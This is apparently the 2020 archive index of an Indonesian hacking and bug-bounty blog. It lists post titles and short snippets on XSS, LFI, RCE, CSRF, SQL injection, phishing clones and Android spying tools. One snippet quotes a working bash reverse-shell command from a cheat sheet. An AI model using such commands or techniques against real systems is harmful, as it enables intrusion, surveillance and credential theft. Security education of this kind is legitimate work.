Arsip 2020

From Stalking To Hacking - Real Case

Setelah lama istirahat dari aktivitas hacking dan fokus nge wibu, beberapa waktu lalu nakanosec mendapat pengalaman yang menarik untuk ditulis di s…
Littel Littel

Cara Mencari Celah Local File Inclusion dan Exploitasi - LFI Tutorial

Local File Inclusion atau LFI adalah kerentanan / vulnerability yang umum ditemukan pada aplikasi web. Kerentanan ini memungkinkan penyerang/at…
Littel Littel

Exploitasi Celah Insecure Firebase

Firebase adalah  Realtime database yang dikembangkan oleh google dimana seringkali penggunaannya digunakan pada aplikasi mobile, namun ada juga p…
Littel Littel

Bug Hunt For Fun

Setelah beberapa waktu berburu di program bugbounty saya mencoba untuk berburu di alam liar menggunakan dorking untuk mencari program yang menjalank…
marzuki marzuki

Remote XSS dengan R3vSh3ll3r (Reverse XSS)

Melakukan remote xss adalah hal yang mungkin dimana attacker dapat mengendalikan payload yang sudah dieksekusi atau ditanam. Bagaimana cara kerja exp…
Littel Littel

Prevent XSS In Javascript

XSS enables attackers to inject client-side scripts into web pages viewed by other users may can be lead to cookie stealing. Sometimes we had vul…
Littel Littel

Mencegah Clickjacking dan XSS dengan CSP

Content Security Policy adalah header yang biasa digunakan untuk mengkonfigurasi laman web dimana kita dapat membuat aturan aturan tertentu yang dapa…
Littel Littel

Mengenal Kerentanan dari Broken Link

Broken link sendiri adalah sebuah link pada halaman website yang dimana jika diklik tidak ditemukan, link error, atau 404 not found pada browser. …
Littel Littel

Laravel RCE dengan APP_KEY (CVE-2018-15133)

Beberapa hari belakangan ini banyak beredar tentang exploit laravel RCE dimana pada bug ini memanfaatkan APP_Key yang bisa kita dapat dari .env at…
Littel Littel

Mengenal Bug Metadata Disclosure

Beberapa waktu yang lalu saya melaporkan kerentanan pada situs social media dimana situs ini memikiki kerentanan Metadata Disclosure.  Metadata Disc…
Littel Littel

Membuat Rubber Ducky dengan Arduino (Attiny85 Digispark)

Oke, Gua gatau gimana bikin kalimat pembuka, yaudahlah kalimat pembukanya ngasal aja yah... Jadi pas gua ada praktikum instrumen kendali dimana ma…
Littel Littel

Code Injection Pada Bot Discord

Discord adalah aplikasi VoIP freeware eksklusif dan platform distribusi digital yang dirancang untuk komunitas permainan video, yang berspesialisasi…
Littel Littel

Bypass RCE (Remote Code Execution) dengan One Line Command

Diambil dari sebuah thread pada grup IndoXploit dimana ketika melakukan RCE mendapatkan Error dengan HTTP ERROR CODE 500 ada beberapa teknik untuk m…
Littel Littel

Backconnect / Reverse Shell Windows Server

Sebelumnya mau cerita dikit case pada saat saya ingin melakukan backconnect atau Reverse Shell pada Windows Server. Pada kasus ini saya memiliki masa…
Littel Littel

Sql Injection Into Outfile to Reverse Shell (Backconnect)

Umm,,, Karna beberapa alasan nakanosec tidak bisa update dalam beberapa minggu ini, Tapi hari ini kita dah comeback lagi.. Hari ini kita bakalan bah…
Littel Littel

Bypass Login Menggunakan Cookie dari XSS

Kali ini nakanosec bakalan bahas tentang cara menggunakan cookie untuk login, artikel ini ditujukan buat temen temen yang belom paham penggunak…
Littel Littel

Bypass Shell Backdoor (Terdownload, Forbidden, Terhapus)

Shell Backdoor adalah file yang ditanamkan oleh attacker ke server pada aktivitas hacking. Biasanya shell backdoor dibuat dengan format php atau a…
Littel Littel

Exploitasi CSRF Attack (Cross Site Request Forgery)

CSRF adalah singkatan dari Cross-site request forgery , Kerentanan ini memanfaatkan sesi yang ada tanpa perlindungan token csrf sebagai seranga…
Littel Littel

Bug Bounty Pertama - IDOR (Insecure Direct Object References)

Hello kenalin gua Salman aka Chiper, Dikesempatan kali ini gua bikin write up bounty pertama gua. Cerita tentang gimana caranya bikin report yan…
Littel Littel

Exploitasi Host Header Injection

Host Header Injection adalah kerentanan yang  memanfaatkan perubahan host pada request header situs web atau aplikasi web mana yang harus memproses…
Littel Littel

Pengenalan XSS - (Pengertian, Jenis, Impact dan Contoh)

Pengertian XSS (Cross Site Scripting) merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang d…
Littel Littel

Cloning web dengan Wget dan Menyisipkan Logger send Telegram - Mr.Robot eps 3

Di Episode Ke 3 Mr.robot menggunakan teknik phising untuk melakukan serangan social engineering. Mr robot melakukan clone dan menyisipkan logger di…
Littel Littel

Mencari Ip device satu jaringan (WIFI) - Arp Scan

Mungkin sudah banyak yang tau atau yang punya tools untuk scanning IP user yang satu jaringan. Walaupun sudah basi tapi tidak ada salahnya untuk be…
Littel Littel

Reverse Shell Command Cheat Sheet

Reverse Shell dengan Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Reverse Shell dengan PERL perl -e 'use Socket;$i="…
Littel Littel

Mengenal Shellshock [Out of Date Bug] - Mr.Robot Eps.2

Shellshock adalah kerentanan yang ditemukan pada sistem operasi linux pada tahun 2014 (CVE-2014-6271). Shellshock sendiri memanfaatkan kerentan…
Littel Littel

Kumpulan Http Status - Lengkap

Kumpulan Http Status Code: 100 Continue 206 Partial Content 403 Forbidden 300 Multiple Choices 101 Switching Protocols 200 OK 302 Moved Te…
Littel Littel

Membuat Wordlist Powerfull Untuk Hacking Email - Mr.Robot eps 1

Wordlis t adalah kumpulan banyak kata dalam satu file. Biasanya wordlist sendiri digunakan untuk melakukan bruteforce. Tapi sebanyak apapun word…
Littel Littel

Apa itu Directory Listing (Dirlisting) dan Bahayanya

Directory Listing (Dirlisting) adalah fungsi server web yang menampilkan daftar semua file ketika tidak ada file indeks, seperti index.php, index…
Littel Littel

Melihat tampilan situs sebelum diretas

Mungkin Anda pernah mengalami website yang anda kelola tiba tiba di deface atau diretas oleh seseorang. Perubahan tampilan website dirubah dengan pe…
Littel Littel

Out Of Scope Google Clickjacking

Clickjacking (User Interface redress attack) adalah teknik jahat untuk menipu pengguna agar mengklik sesuatu yang berbeda dari apa yang dilihat p…
Littel Littel

SQLmap Bypass 500 Internal Server Error

Apa Kalian Mencari teknik bypass 500 Internal Server Error?  Ketika Mau Retriv db (enumerate Database) Muncul Error Kode 500
Littel Littel

Sadap Android dengan AhMyth dan Ngrok

Banyak banget orang yang nanya gimana cara buat nyadap hape atau gadget android.. disini semua yang saya tulis real sesuai apa yang pernah lakuin.…
Littel Littel

Mencari Celah Open Redirect (Unvalidated Redirect) dan Pengunaannya

Karna banyaknya pertanyaan pada postikan di fanspage nakanosec tentang open redirect kali ini kita bakal belajar tentang bug open redirect dan peny…
Littel Littel

Session Puzzling / Session Variable Overloading Exploit

Session Puzzling adalah kerentanan tingkat aplikasi yang terjadi ketika variabel session aplikasi menggunakan lebih dari satu tujuan. Nama lain da…
Littel Littel

Celah Dos pada Regex (ReDos)

Regular Expression (REGEX) adalah konstruksi bahasa untuk mencocokkan teks berdasarkan pola tertentu, terutama untuk kasus-kasus kompleks. Contoh…
Littel Littel

PHP Code Injection

PHP Code Injection adalah kerentanan/kelemahan pada sebuah website yang memungkinkan penyerang untuk menyisipkan kode khusus ke dalam mesin scrip…
Littel Littel

Mengenal Pixel Flood dan Frame Flood Attack

Artikel kali ini akan membahas serangan pixel flood dan frame flood attack, ini termasuk serangan Denial of service. Apa itu Pixel Flood dan Frame…
Littel Littel

Exposed Source Code pada Website

Kali ini saya akan membahas tentang source code yang tidak tertutup yang bisa mengakitbatkan terdapat file file yang tidak diinginkan terlihat. Mohon…
Littel Littel

Bug Tabnabbing pada Instagram

Tabnabbing adalah teknik serangan eksploit sejenis phishing, yang membujuk pengguna untuk mengirimkan detail login dan kata sandi mereka ke situs we…
Littel Littel

Common Bug Pada Laravel

Common Bug adalah bug yang paling sering ditemukan pada perangkat keras atau perangkat lunak yang mengakibatkan terjadinya galat pada peralatan…
Littel Littel

Mastering Search Engine Hacking

1.Google
Littel Littel